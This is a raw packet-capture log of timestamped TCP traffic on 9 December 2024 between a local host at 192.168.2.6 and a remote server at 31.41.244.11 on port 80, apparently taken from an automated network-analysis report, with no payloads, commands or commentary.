                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.433892965 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.435005903 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.435058117 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.435164928 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.435206890 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.436551094 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.436563015 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.436594963 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.436616898 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.437901974 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.437912941 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.437951088 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.439351082 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.439395905 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.439541101 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.439584970 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.440706968 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.440752029 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.440905094 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.440947056 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.442106009 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.442116976 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.442151070 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.443403006 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.443461895 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.443708897 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.443743944 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.444778919 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.444825888 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.444941044 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.444983959 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.446213961 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.446253061 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.446506977 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.446546078 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.447568893 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.447611094 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.447752953 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.447797060 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.448874950 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.448913097 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.449043036 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.449080944 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.450156927 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.450201988 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.450437069 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.450478077 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.451536894 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.451581001 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.451875925 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.451948881 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.452785969 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.452832937 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.452935934 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.452979088 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.453988075 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.454041004 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.454339981 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.454385996 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.455459118 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.455480099 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.455502033 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.455519915 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.456746101 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.456758976 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.456795931 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.456813097 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.457564116 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.457580090 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.457608938 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.457631111 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.459408045 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.459419012 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.459455967 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.459472895 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.460500002 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.460511923 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.460551023 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.461644888 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.461690903 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.461782932 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.461822033 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.462901115 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.462944984 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.463080883 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.463125944 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.463676929 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.463689089 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.463721037 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.463743925 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.464801073 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.464859009 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.465118885 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.465161085 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.466049910 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.466118097 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.466154099 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.466196060 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.467250109 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.467307091 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.467348099 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.467387915 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.588417053 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.588516951 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.588587046 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.588629007 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.588654041 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.588689089 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.588735104 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.588777065 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.588905096 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.588943958 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.589514971 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.589555025 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.589634895 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.589674950 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.590362072 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.590404034 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.590428114 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.590467930 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.591217041 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.591276884 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.591346025 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.591393948 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.592081070 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.592128038 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.592191935 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.592232943 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.592953920 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.593007088 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.593038082 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.593077898 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.593976021 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.594022036 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.594100952 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.594139099 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.594716072 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.594755888 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.594779968 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.594822884 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.595617056 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.595663071 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.595695019 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.595741034 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.596491098 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.596529961 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.596657991 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.596725941 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.597357035 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.597404957 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.597460032 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.597501993 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.598191977 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.598243952 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.598268986 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.598309994 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.599039078 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.599092960 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.599195004 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.599247932 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.600044012 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.600092888 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.600826979 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.600837946 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.600877047 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.601521969 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.601602077 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.601660967 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.601727962 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.602102041 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.602148056 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.602504969 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.602547884 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.602628946 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.602664948 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.603454113 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.603512049 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.603712082 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.603751898 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.604286909 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.604331970 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.604408979 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.604449987 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.605134010 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.605173111 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.605434895 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.605473995 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.605989933 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.606031895 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.606067896 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.606108904 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.606904984 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.606947899 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.607039928 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.607078075 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.607773066 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.607812881 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.607908964 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.607949972 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.608678102 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.608750105 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.608777046 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.608817101 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.609546900 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.609569073 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.609599113 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.609607935 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.610321045 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.610364914 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.610440969 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.610483885 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.611169100 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.611237049 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.611288071 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.611330986 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.612066984 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.612113953 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.612118959 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.612154007 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.612991095 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.613048077 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.613060951 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.613111973 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.613847971 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.613898993 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.613938093 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.613985062 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.614713907 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.614758968 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.614840984 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.614881039 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.615550041 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.615636110 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.615660906 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.615717888 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.616456985 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.616507053 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.616589069 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.616631985 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.617290020 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.617340088 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.617482901 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.617522001 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.618128061 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.618181944 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.618294954 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.618335962 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.619050026 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.619112015 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.619131088 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.619168997 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.619982004 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.620023966 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.620146036 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.620187044 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.620731115 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.620774984 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.620840073 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.620879889 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.621614933 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.621654034 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.621808052 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.621848106 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.622497082 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.622570038 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.622590065 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.622626066 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.623367071 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.623406887 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.623486996 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.623528957 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.624289989 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.624336958 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.624514103 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.624553919 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.625080109 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.625121117 CET4987480192.168.2.631.41.244.11
